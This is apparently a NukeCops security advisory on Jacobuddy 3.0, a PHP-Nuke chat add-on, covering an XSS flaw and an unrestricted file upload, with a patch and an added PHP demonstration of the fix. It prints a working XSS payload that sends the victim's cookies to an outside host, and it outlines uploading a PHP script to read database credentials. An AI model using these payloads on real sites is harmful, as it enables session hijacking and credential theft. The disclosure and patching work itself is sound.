Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
Date: Saturday, March 01 @ 23:44:02 CET
Topic: Security


Officially Released For Publication by Computer Cops.

Jacobuddy, a JavaScript real-time chat module, is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and to file system manipulation through its file transfer feature. Our practice is to contact the author prior to a public posting; in this case we have also supplied a fix for both vulnerabilities in this add-on.

The following URL is a sample of how a Jacobuddy message body can be seeded with an XSS payload:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

In the current unpatched version the message text is placed unencoded inside an attribute of the pop-up Jacobuddy message, so the double quote in the payload closes that attribute and injects a style attribute whose javascript: URL the recipient's browser executes when it renders the pop-up. The script then rewrites document.URL, automatically redirecting the recipient to the attacker's site with the cookies for the attacked site appended to the query string.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));
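The following is an added example, not code from Jacobuddy or from Computer Cops, that shows why this one-line fix neutralizes the sample payload. The render_popup() function is a hypothetical stand-in for how buddy.php interpolates a message into the pop-up markup (the real template may differ); the payload is a constructed copy of the sample URL above.

```php
<?php
// Added example, not Jacobuddy's own code.
// Hypothetical: the message lands inside a double-quoted attribute, which is
// what the leading  "style=  breakout in the sample payload implies.
function render_popup($message)
{
    return '<a href="' . $message . '">Open message</a>';
}

// The patched send(): strip any HTML tags, then encode the metacharacters
// (<, >, &, ") that would otherwise change the meaning of the markup.
function sanitize_message($message)
{
    return htmlspecialchars(strip_tags($message));
}

// Returns true when the sanitized text can no longer break out of a
// double-quoted attribute or start a tag.
function is_attribute_safe($sanitized)
{
    return strpbrk($sanitized, '"<>') === false;
}

// Constructed copy of the advisory's sample payload.
$payload = 'http://www.laudanski.com/"style="background-image:url(javascript:'
         . "nurl='http://www.laudanski.com/j.cgi?';"
         . "nurl=nurl+document.cookie;document.URL=nurl)";

echo "Unpatched:\n" . render_popup($payload) . "\n\n";
// The attribute is closed by the payload's first quote, so a style attribute
// with a javascript: URL is injected into the anchor tag.

$clean = sanitize_message($payload);
echo "Patched:\n" . render_popup($clean) . "\n";
// Every " becomes &quot;, so the whole payload stays inert attribute text.
echo "Attribute-safe: " . (is_attribute_safe($clean) ? 'yes' : 'no') . "\n";
```

Two caveats for anyone applying the fix: htmlspecialchars() with no flags leaves single quotes untouched (pass ENT_QUOTES if the template ever puts the message in a single-quoted attribute), and the fix only covers the send() path, so a message that is stored and rendered anywhere else must be encoded at that output point as well.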

The next vulnerability is the infamous dcc file transfer feature within the buddy.php file.

Any file uploaded through it stays on the server, and nothing restricts what is uploaded. A malicious PHP script can therefore be uploaded and then requested through the web server, where it runs with the web server's privileges: it can read vital files such as the PHP-Nuke config.php (which holds the database credentials), write the contents to a text file, and let the uploader fetch that file. Computer Cops highly advises that the entire dcc function be removed from the file, in addition to the dcc case block and the $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.





This article comes from NukeCops
http://www.nukecops.com

The URL for this story is:
http://www.nukecops.com/modules.php?name=News&file=article&sid=84